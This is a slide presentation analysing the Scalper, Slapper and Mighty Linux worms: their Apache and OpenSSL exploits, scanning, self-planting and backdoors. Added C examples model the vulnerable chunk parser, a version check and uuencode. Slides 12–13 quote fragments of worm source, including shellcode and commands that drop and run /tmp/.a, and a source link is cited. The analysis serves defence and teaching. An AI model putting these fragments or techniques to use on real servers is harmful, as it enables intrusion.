Linux Internet Worms - PowerPoint PPT Presentation

1
Linux Internet Worms
- Scalper, Slapper and Mighty
  • Cheol-Min Hwang
  • cmhwang_at_ecs.syr.edu

2
Contents
  • Overview
  • Background
  • Descriptions and details
  • Scalper code snippets
  • Opinions
  • References

3
Overview
  • Scan target
    • a range of random IP addresses
  • Check vulnerability
    • send a simple HTTP request
    • attempt to exploit the vulnerability
  • Plant worm
    • encode and upload the source
    • decode, compile and execute
  • The same cycle as CodeRed!

4
Background
  • 63% of web sites run Apache
    • Netcraft Web Server Survey, July 2003
  • Apache vulnerability
    • buffer overflow via a chunk-encoded HTTP request
      (chunked-encoding bug, CVE-2002-0392)
  • OpenSSL vulnerability
    • buffer overflow via a large SSLv2 client master key or a
      large session ID (CVE-2002-0656)
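
The chunked-encoding bug named above is, at its core, a chunk size parsed without an overflow check and then handled as a signed quantity: a size like FFFFFFF0 wraps to a negative number, passes the "larger than the buffer?" test, and reaches the copy routine as an enormous size_t. The following is an added model of that bug class, not code from the slides or from Apache itself; it assumes an 8 KiB read buffer (MODEL_BUFSIZ), a hypothetical per-chunk policy limit (CHUNK_MAX), and 32-bit arithmetic as on the servers of the time. The hardened variant beside it parses unsigned, detects overflow, requires at least one digit and clamps in size_t.

```c
#include <ctype.h>
#include <stddef.h>
#include <stdint.h>

#define MODEL_BUFSIZ 8192u        /* assumed size of the server's read buffer */
#define CHUNK_MAX    0x7FFFFFFFu  /* hypothetical policy limit for a single chunk */

/* Hex digit value, or -1 if `c` is not a hex digit. */
static int hexval(int c)
{
    if (isdigit(c)) return c - '0';
    c = tolower(c);
    return (c >= 'a' && c <= 'f') ? c - 'a' + 10 : -1;
}

/* Vulnerable path: the chunk size is accumulated with no overflow check and then
 * treated as a signed 32-bit number. "FFFFFFF0" wraps to -16, which is not
 * "greater than the buffer", so the clamp lets it through and the copy would be
 * called with (size_t)-16. Returns the signed length that would be passed on. */
int32_t chunk_len_vulnerable(const char *line)
{
    uint32_t raw = 0;
    int d;
    while (*line == ' ' || *line == '\t') line++;
    while ((d = hexval((unsigned char)*line)) >= 0) {
        raw = (raw << 4) | (uint32_t)d;      /* silently wraps past 32 bits */
        line++;
    }
    /* reinterpret as two's-complement int32 without relying on an implementation-defined cast */
    int32_t remaining = (raw >= 0x80000000u) ? (int32_t)((int64_t)raw - 4294967296LL)
                                             : (int32_t)raw;
    /* the signed clamp: a negative value passes straight through */
    int32_t len_to_read = (remaining > (int32_t)MODEL_BUFSIZ) ? (int32_t)MODEL_BUFSIZ : remaining;
    /* ... memcpy(buf, src, (size_t)len_to_read) would follow here ... */
    return len_to_read;
}

/* Hardened path: unsigned parsing with overflow detection, a hard upper bound,
 * at least one digit required, only ";ext" or CRLF allowed after the digits, and
 * the clamp done in size_t. Returns the length to read, or -1 on rejection. */
long chunk_len_hardened(const char *line)
{
    uint64_t v = 0;
    int d, ndigits = 0;
    while (*line == ' ' || *line == '\t') line++;
    while ((d = hexval((unsigned char)*line)) >= 0) {
        if (v > (CHUNK_MAX >> 4)) return -1;   /* the next shift would exceed the cap */
        v = (v << 4) | (uint64_t)d;
        ndigits++;
        line++;
    }
    if (ndigits == 0 || v > CHUNK_MAX) return -1;
    if (*line != ';' && *line != '\r' && *line != '\n' && *line != '\0') return -1;
    return (long)((v > MODEL_BUFSIZ) ? MODEL_BUFSIZ : (size_t)v);
}
```

The two functions make the difference visible on the same chunk-size line: the vulnerable one returns -16 for "FFFFFFF0", the hardened one refuses it before any length is computed.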

5
Description (Scalper)
  • Unix worm
  • Hard-coded target scanning
  • Exploits the Apache chunked-encoding vulnerability
  • Backdoor functionality
    • DDoS attack
    • mass e-mailing
    • downloading and executing a binary
    • port opening and shell command execution
  • Not prevalent in the wild
    • spotted on a honeypot

6
More (Scalper)
  • Target scan
    • A.B.xxx.xxx: hard-coded leading octets, random lower octets
  • Vulnerability check
    • send GET / to port 80
    • send a specially crafted buffer (chunked-encoding vulnerability)
  • Worm plant
    • send itself in uuencoded form to /tmp
    • decode as /tmp/.a and run it
  • Activate the backdoor component
    • UDP port 2001
    • encrypted backdoor communication
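
The "send GET / to port 80" step is a banner check: the Server header of the reply says whether the host runs an Apache release older than the fixed versions (1.3.26 and 2.0.39). The code below is an added example of that decision logic, not Scalper's own code; the responses are constructed inline to stand in for what a live GET would return, and the function names are this example's own.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* Constructed responses standing in for what "GET / HTTP/1.0" to port 80 returns. */
static const char RESP_OLD[]  = "HTTP/1.1 200 OK\r\nDate: Mon, 01 Jul 2002 10:00:00 GMT\r\n"
                                "Server: Apache/1.3.20 (Unix)\r\nContent-Type: text/html\r\n\r\n<html>";
static const char RESP_NEW[]  = "HTTP/1.1 200 OK\r\nServer: Apache/2.0.40 (Unix)\r\n\r\n<html>";
static const char RESP_PROD[] = "HTTP/1.1 200 OK\r\nServer: Apache\r\n\r\n<html>";  /* ServerTokens Prod */
static const char RESP_IIS[]  = "HTTP/1.1 200 OK\r\nServer: Microsoft-IIS/5.0\r\n\r\n<html>";
static const char RESP_NONE[] = "HTTP/1.1 200 OK\r\nContent-Length: 0\r\n\r\n";

/* Case-insensitive prefix match (header names are case-insensitive). */
static int has_prefix_ci(const char *s, const char *prefix)
{
    for (; *prefix; s++, prefix++)
        if (tolower((unsigned char)*s) != tolower((unsigned char)*prefix)) return 0;
    return 1;
}

/* Copy the value of the Server: header out of a raw HTTP response.
 * Returns 0 on success, -1 if the header is absent or the response is malformed. */
int http_server_header(const char *response, char *out, size_t outcap)
{
    const char *line = strstr(response, "\r\n");       /* skip the status line */
    if (!line) return -1;
    line += 2;
    while (*line && !(line[0] == '\r' && line[1] == '\n')) {  /* until the blank line */
        const char *eol = strstr(line, "\r\n");
        if (!eol) return -1;
        if (has_prefix_ci(line, "Server:")) {
            const char *v = line + 7;
            while (v < eol && (*v == ' ' || *v == '\t')) v++;
            size_t n = (size_t)(eol - v);
            if (n + 1 > outcap) return -1;
            memcpy(out, v, n);
            out[n] = '\0';
            return 0;
        }
        line = eol + 2;
    }
    return -1;
}

/* Parse the version out of "Apache/1.3.20 (Unix) ...". Returns 0 on success. */
int apache_version(const char *server, int *maj, int *min, int *patch)
{
    const char *a = strstr(server, "Apache/");
    if (!a) return -1;
    return sscanf(a + 7, "%d.%d.%d", maj, min, patch) == 3 ? 0 : -1;
}

/* The chunked-encoding bug was fixed in Apache 1.3.26 and 2.0.39. Returns 1 when
 * the banner names an earlier release on either branch, 0 otherwise (including
 * banners without a version, which this check cannot classify). */
int apache_chunked_vulnerable(const char *server)
{
    int maj, min, patch;
    if (apache_version(server, &maj, &min, &patch) != 0) return 0;
    if (maj == 1 && min == 3) return patch < 26;
    if (maj == 2 && min == 0) return patch < 39;
    return 0;
}

/* Whole check over a raw response: 1 = vulnerable release named,
 * 0 = not vulnerable or not classifiable, -1 = no Server header at all. */
int check_response(const char *response)
{
    char server[128];
    if (http_server_header(response, server, sizeof server) != 0) return -1;
    return apache_chunked_vulnerable(server);
}
```

The caveat a defender should keep in mind is that the banner is self-reported: ServerTokens Prod hides the version (a false negative for the worm, which then falls back to just sending the exploit), and distributions that backported the fix without bumping the version string produce false positives for any banner-based scanner.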

7
Description (Slapper)
  • Unix worm
  • Exploits the OpenSSL vulnerability
  • Peer-to-peer network creation
  • Backdoor functionality
    • DDoS attack
    • mass e-mailing
    • downloading and executing a binary
    • system information gathering
  • More than 3,500 infected systems (Sep. 2002)

8
More (Slapper)
  • Vulnerability check
    • send the exploit code to port 443 (SSL service)
  • Worm plant
    • decode, compile with gcc and run
    • variants, by the source dropped in /tmp:
      • (A) /tmp/.bugtraq
      • (B) .cinik: information gathering, virus
      • (C) .unlock: compiled binaries named httpd and update

9
More (Slapper)
10
Description (Mighty)
  • Unix worm
  • Exploits the OpenSSL vulnerability
  • Based on Slapper (a Slapper variant)
  • IRC server connection
    • based on the Age of Kaiten IRC bot
  • Backdoor functionality
    • DDoS attack
    • downloading and executing a binary
  • Around 1,600 infected systems (Oct. 2002)

11
More (Mighty)
  • IRC connection
    • connects to an IRC server in the UK
    • joins a password-protected channel
  • Worm plant
    • devnull, k, sslx.c and script.sh in the /tmp/.socket2
      directory
  • Infection mark
    • /tmp/.god_you_make_me_laugh_canin-boy

12
Scalper Code Snippet (1)
  • Source code available (C program, 2,254 lines)
  • Target scan
      else d
      sprintf(srv, "%d.%d.%d.%d", a, b, c, d);
      clientsn.ext = time(NULL);
      atcp_sync_connect(clientsn, srv, SCANPORT);
      write(sock, "GET / HTTP/...", strlen("GET / ...
  • Vulnerability exploit
      char shellcode[] = "\x68\x47\x47\x47\x47\x89...
      PUT_STRING("POST / HTTP...
      memcpy(p, shellcode, sizeof(shellcode) - 1);
      p += sizeof(shellcode) - 1;
      PUT_STRING("\r\n");

13
Scalper Code Snippet (2)
  • Worm plant
      if ((in = fopen("/tmp/.a", "r")) == NULL) return 0;
      writem(a, "begin 655 .a\n");
      while ((n = fread(buf, 1, 45, in)))
      writem(sock, "\nrm -rf /tmp/.a; cat > /tmp/.uua <<
      sprintf(buf, "/usr/bin/uudecode -p /tmp/.uua > /tmp/.a
  • Backdoor
      if (udpserver.len != 0) if (!audp_recv(udpserver, udpclient, buf, 3000))
      struct header *tmp = (struct header *)buf;
      if (udpserver.len > sizeof(struct header))
      switch (tmp->tag)
      case 0x20: // Versione
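
The worm-plant step on slides 6 and 13 is plain uuencode pushed through the shell the exploit obtained: a "begin 655 .a" header, the file read 45 bytes at a time (the fread(buf, 1, 45, in) loop), each line prefixed with its length character, then uudecode on the victim. The following is an added example of that transfer format with both directions, not code from Scalper or from the slides; the sample data is constructed inline, the function names are this example's own, and the decoder does the output-bounds checking a worm's throwaway decoder skips.

```c
#include <stdio.h>
#include <string.h>

#define UU_LINE 45   /* bytes per encoded line, matching the fread(buf, 1, 45, in) loop */

/* 6-bit value to its printable character; zero is written as '`'. */
static char uu_enc(unsigned v) { v &= 0x3f; return v ? (char)(v + 32) : '`'; }
/* Printable character back to 6 bits; accepts both ' ' and '`' for zero. */
static unsigned uu_dec(char c) { return ((unsigned char)c - 32u) & 0x3fu; }

/* uuencode `len` bytes of `in` into `out` with a "begin <mode> <name>" header and
 * the "`" / "end" trailer. Returns characters written (NUL terminated) or -1. */
long uuencode_buf(const unsigned char *in, size_t len, const char *mode,
                  const char *name, char *out, size_t outcap)
{
    int h = snprintf(out, outcap, "begin %s %s\n", mode, name);
    if (h < 0 || (size_t)h >= outcap) return -1;
    size_t o = (size_t)h, i = 0;
    for (;;) {
        size_t n = (len - i > UU_LINE) ? UU_LINE : len - i;
        if (o + 1 + 4 * ((n + 2) / 3) + 1 + 5 > outcap) return -1; /* room for "end\n" + NUL */
        out[o++] = uu_enc((unsigned)n);                  /* 'M' for a full 45-byte line */
        for (size_t k = 0; k < n; k += 3) {
            unsigned c0 = in[i + k];
            unsigned c1 = (k + 1 < n) ? in[i + k + 1] : 0;   /* zero-pad the last group */
            unsigned c2 = (k + 2 < n) ? in[i + k + 2] : 0;
            out[o++] = uu_enc(c0 >> 2);
            out[o++] = uu_enc((c0 << 4) | (c1 >> 4));
            out[o++] = uu_enc((c1 << 2) | (c2 >> 6));
            out[o++] = uu_enc(c2);
        }
        out[o++] = '\n';
        i += n;
        if (n == 0) break;                               /* the zero-length line ends the body */
    }
    memcpy(out + o, "end\n", 5);                         /* includes the NUL */
    return (long)(o + 4);
}

/* Decode a uuencode stream into `out` and copy the file name from the begin line
 * into `name`. Returns the decoded length, or -1 on malformed input or when the
 * output would not fit. */
long uudecode_buf(const char *in, unsigned char *out, size_t outcap, char *name, size_t namecap)
{
    if (strncmp(in, "begin ", 6) != 0) return -1;
    const char *p = in + 6;
    while (*p && *p != ' ') p++;                         /* skip the mode */
    if (*p++ != ' ') return -1;
    const char *nl = strchr(p, '\n');
    if (!nl || (size_t)(nl - p) + 1 > namecap) return -1;
    memcpy(name, p, (size_t)(nl - p));
    name[nl - p] = '\0';
    p = nl + 1;
    size_t o = 0;
    for (;;) {
        if (*p == '\0') return -1;
        size_t n = uu_dec(*p++);                         /* bytes carried by this line */
        if (n == 0) break;
        if (o + n > outcap) return -1;
        unsigned char tmp[64];                           /* up to 21 groups of 3 bytes */
        for (size_t g = 0; g < (n + 2) / 3; g++) {
            unsigned c[4];
            for (int j = 0; j < 4; j++) {
                if (*p == '\n' || *p == '\0') return -1;  /* line shorter than its count */
                c[j] = uu_dec(*p++);
            }
            tmp[3 * g]     = (unsigned char)((c[0] << 2) | (c[1] >> 4));
            tmp[3 * g + 1] = (unsigned char)((c[1] << 4) | (c[2] >> 2));
            tmp[3 * g + 2] = (unsigned char)((c[2] << 6) | c[3]);
        }
        memcpy(out + o, tmp, n);
        o += n;
        if (!(nl = strchr(p, '\n'))) return -1;
        p = nl + 1;
    }
    if (!(nl = strchr(p, '\n'))) return -1;              /* rest of the zero-length line */
    return strncmp(nl + 1, "end", 3) == 0 ? (long)o : -1;
}

/* Round trip over constructed sample data, the way the worm ships /tmp/.a; 1 on success. */
int uu_selftest(void)
{
    unsigned char data[100], back[128];
    char enc[512], name[16];
    for (size_t i = 0; i < sizeof data; i++) data[i] = (unsigned char)(i * 7 + 3);
    long elen = uuencode_buf(data, sizeof data, "655", ".a", enc, sizeof enc);
    if (elen < 0 || strncmp(enc, "begin 655 .a\nM", 14) != 0) return 0;
    long dlen = uudecode_buf(enc, back, sizeof back, name, sizeof name);
    return dlen == (long)sizeof data && memcmp(data, back, sizeof data) == 0 && strcmp(name, ".a") == 0;
}

/* Decode `stream` and compare with the NUL-terminated `expected`; 1 on match. */
int uu_decodes_to(const char *stream, const char *expected)
{
    unsigned char buf[256];
    char name[64];
    long n = uudecode_buf(stream, buf, sizeof buf, name, sizeof name);
    return n >= 0 && (size_t)n == strlen(expected) && memcmp(buf, expected, (size_t)n) == 0;
}
```

Seen from the detection side, the same format is what to look for in web server logs and shell histories after an Apache compromise of this era: a "begin 6.. ." header followed by 61-character lines starting with 'M' and a uudecode -p into /tmp.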

14
Opinions
  • Even though malicious code for Linux is not yet widespread,
    this situation will not last:
    • more Linux users
    • Linux servers (web, file, application)
    • Linux applications (StarOffice, OpenOffice)
    • cross-platform viruses (Winux, Etap)
    • the open nature of the platform
    • the misbelief that Linux is a safe box

15
References
  • Analysis
    • Sophos
    • Network Associates
    • Symantec
    • VirusList.com
    • F-Secure
  • Vulnerability
    • Apacheweek.com
    • httpd.apache.org
    • cve.mitre.org
  • First Apache Worm Uncovered (source code)
    • http://dammit.lt/apache-worm/